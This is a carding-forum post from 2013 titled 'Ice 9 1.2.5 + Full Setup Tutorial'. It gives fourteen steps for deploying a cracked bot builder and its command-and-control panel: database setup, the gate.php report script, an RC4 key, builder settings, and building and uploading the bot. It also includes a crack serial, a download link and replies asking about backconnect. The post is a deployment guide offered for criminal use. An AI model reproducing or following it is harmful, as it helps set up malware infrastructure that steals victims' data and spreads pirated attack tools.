View Full Version : Ice 9 1.2.5 + Full Setup Tutorial

CardingMafia Admin
02-12-2013, 06:59 PM

Just for lulz...

How to set up:
1. Create one mysql db.
2. Upload contents of web directory to your host, you need to have something like: ice9.com/ice9dir/adm/gate.php
3. Open in your browser ice9.com/ice9dir/adm/install and paste mysql info, root user and rc4 key.
4. Enable 'write reports to database' and chmod 777 ice9.com/ice9dir/adm/system >> click 'install' (save rc4 key before).
5. Delete ice9.com/ice9dir/adm/install directory.
6. Open ArmaFP.exe >> hwid= 1111-1111
7. Load file= ice9 cracked/builder/full_builder_1.2.5.exe
8. Wait for register dialog and enter:
Name - ApocX
Serial - 0PGTHR-NYGK6C-K7M29K-G2E2V4-VHMAQU-378K1D
9. Open ice9 cracked/builder/settings.txt and make it like this:
autoupdate_path "http://ice9.com/ice9dir/settings.bin
receiving_script_path "http://ice9.com/ice9dir/adm/gate.php
10. Setting's path: http://ice9.com/ice9dir/config/index.php
RC4 encryption key: paste your key used when you installed panel
11. Click 'build bot's settings' > save as settings.bin then click 'build bot' and save your server.
12. Upload settings.bin to ice9.com/ice9dir/config/ directory
13. Log in your panel: ice9.com/ice9dir/adm/index.php
14. Profit.

DL: Ice9 cracked.zip (http://ge.tt/10KXxBX/v/0?c)

02-25-2013, 01:27 PM
But how to setup the backconnect?

04-17-2014, 11:05 AM
incorrect serial or username, please update